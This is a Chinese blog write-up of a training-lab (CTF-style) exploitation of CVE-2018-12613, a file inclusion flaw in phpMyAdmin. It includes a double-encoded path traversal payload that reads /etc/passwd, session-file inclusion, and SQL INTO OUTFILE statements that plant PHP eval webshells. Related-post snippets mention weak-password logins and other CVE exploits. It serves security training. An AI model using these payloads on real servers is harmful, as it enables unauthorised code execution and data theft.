phpMyAdmin后台文件包含分析溯源(CVE-2018-12613)--墨者学院

最新推荐文章于 2023-12-12 00:52:29 发布
最新推荐文章于 2023-12-12 00:52:29 发布
阅读量754 收藏 7
点赞数 1
分类专栏: 墨者学院
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45158261/article/details/107760856
版权

01 背景介绍

phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,
通过二次编码即可绕过检查,造成远程文件包含漏洞。

02 影响版本

phpMyAdmin 4.8.0和4.8.1

03 利用方式

1.写phpinfo文件,利用文件包含,查看绝对路径,

select '<?php phpinfo()?>'

2.写小马

select '<?php @eval($_POST[a])?>' into outfile '/var/www/html/1.php'

04 靶场

在这里插入图片描述
1.证明漏洞
http://219.153.49.228:45973/index.php?target=db_sql.php%253f/../../../../../../etc/passwd,证明存在文件包含
在这里插入图片描述2.写phpinfo,查看绝对路径

select '<?php phpinfo()?>'

在这里插入图片描述poc:index.php?target=db_sql.php%253f/../../../../../../../../../../../tmp/sess_+之前记录的cookie
在这里插入图片描述index.php?target=db_sql.php%253f/../../../../../../../../../../../tmp/sess_k07rli8m3ms5s04av4ttg9q9da227skv

在phpinfo中寻找path,找网站的绝对路径

在这里插入图片描述

3.写php一句木马

select '<?php @eval($_REQUEST[cmd]);?>' into outfile '/var/www/html/1.php'
在这里插入图片描述连接成功,可以用菜刀连接,拿key.txt
在这里插入图片描述
在这里插入图片描述

白鸽i
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)
曹振国的博客
06-15 4921
phpMyAdmin第一种:一、利用burp爆破出账号密码二、尝试写马连入蚁剑1.发现MySQL对导入导出没做任何限制2.查询日志3.利用日志写文件4.访问写入的日志文件6.尝试直接通过into outfile写入一句话木马7.访问phpinfo文件,并连接蚁剑得到key值第二种:一、下载index.php文件进行分析1.发现55到63行存在问题二、下载Core.php进行分析1.找到checkPageValidity函数,在第443行2.查看白名单数组$whitelist3.包含根目录下的key.txt得
墨者学院-phpMyAdmin后台文件包含分析溯源
qq_47094508的博客
07-01 1298
首先拿到题目到点击访问访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器账户密码:root root点击sql模块 对sql语句进行一个查询首先查询sql写一句话的权限我们可以看到他的值为空secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/ 接下来确认一下mysql权限,可以看到这里是最高权限r
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 485
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三种解法,解题过程七分靠技术,三分靠运气~
墨者】靶场练习——phpMyAdmin后台文件包含分析溯源
最新发布
weixin_63082823的博客
12-12 550
首先我们启动靶场,点击访问就会跳转到phpMyAdmin的登陆页面,我们使用弱口令root,root登录。
墨者学院_phpMyAdmin后台文件包含分析溯源
cc_de_csdn的博客
08-22 2516
墨者学院_phpMyAdmin后台文件包含分析溯源 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响 前台可以使用弱口令直接登录...
墨者学院CTF(phpMyAdmin后台文件包含分析溯源)
痴人说梦梦中人
09-11 3060
墨者学院CTF(phpMyAdmin后台文件包含分析溯源) 靶场地址: http://219.153.49.228:45122/ 相关知识: 1.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 2.php代码审计 3.base64编码绕过 思路: 利用过滤规则绕过php文件包含的黑白名单限制,再利用php的session会话机制,包含一句话木马文件获取shell...
0x01.phpMyAdmin后台文件包含分析溯源
qq_31679787的博客
09-11 950
登录界面; phpmyadmin的默认账户名密码是root/空,或者是root/root,尝试后发现是root/root; 通过打开新的phpmyadmin窗口,发现所有参数; 根据cve-2018-12613漏洞可以得到网站根目录/var/www/html; 首先select '<?php phpinfo();?>';然后通过payload构造文件包含; payl...
墨者21道
帅醉了的博客
08-28 913
1.1.1.uWSGI 漏洞复现(CVE-2018-7490) 测试详情 查找CVE-2018-7490漏洞,此漏洞构造…%2f可以访问任意文件,目录遍历,在key.txt前面多添加/…%2f…%2f…%2f…%2就可以得到key 1.1.2.Webmin未经身份验证的远程代码执行 测试详情 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 受影响的版本:Webmin<=1.920 抓包 修改包 第一步,修改
90.网络安全渗透测试—[常规漏洞挖掘与利用篇6]—[文件包含-PHP封装伪协议详解&实战示例]
qwsn
02-01 2485
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、PHP封装伪协议简介 1、php内置封装协议 2、data://命令执行-伪协议 3、zip://压缩流-伪协议 4、php://input输入输出流-伪协议 5、PHP封装伪协议总结 二、PHP封装伪协议的使用 1、Less-5【php input伪协议】【代码审计】 2、Less-6【input filter伪协议【列出文件】【读取flag.php的源码】 。。。。。。。。。。
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
phpmyadmin 远程文件包含漏洞(CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
rsync未授权访问漏洞利用(端口873) --墨者学院
小白鸽
08-04 4806
01 背景介绍 Rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员 优点:速度非常快,因为只同步文件当中不同的地方 Rsync默认端口:873 常用指令: -v, --verbose 详细模式输出。 -q, --quiet 精简输出模式。 -c, --checksum 打开校验开关,强制对文件传输进行校验。 -a, --archive 归档模式,表示以递归方式传输文件,并保持所有文件属性,等于-rl
WordPress 远程命令执行漏洞(CVE-2018-15877)复现 -墨者学院
小白鸽
07-31 1951
01 背景介绍 近日,WordPress 插件Plainview Activity Monitor被曝出存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。 远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。 02 影响范围 Plainview Activity Monitor plugin version <= 20161228 03 利用方式 默认后台 wp-login.php Activity
uWSGI 漏洞复现(CVE-2018-7490) --目录穿越
小白鸽
07-31 800
背景介绍 uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。 利用方法 ../../../../..可以访问到服务器的根目录 靶场 解题思路 本题过滤了"/",所以中间的"/“必须换成”%2f". 查看passwd http://2
Tomcat (CVE-2017-12615)远程代码执行漏洞利用
小白鸽
07-31 543
01 背景介绍 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 02 影响版本 Apache Tomcat 7.0.0 – 7.0.81 03 利用方式 把请求方式改为PUT请求,上传POC <%@ page language=
Ruby On Rails漏洞复现第二题(CVE-2019-5418) --目录穿越
小白鸽
07-31 531
01 背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 ({{闭合模板路径) 02 影响版本 Rails全版本 其中修复版本
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
"phpmyadmin 远程文件包含漏洞(CVE-2018-12613)" 本文将详细解析PHPMyAdmin中的远程文件包含漏洞(CVE-2018-12613),这是一个严重影响该开源MySQL数据库管理工具安全性的漏洞。PHPMyAdmin是一个广受欢迎的Web...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值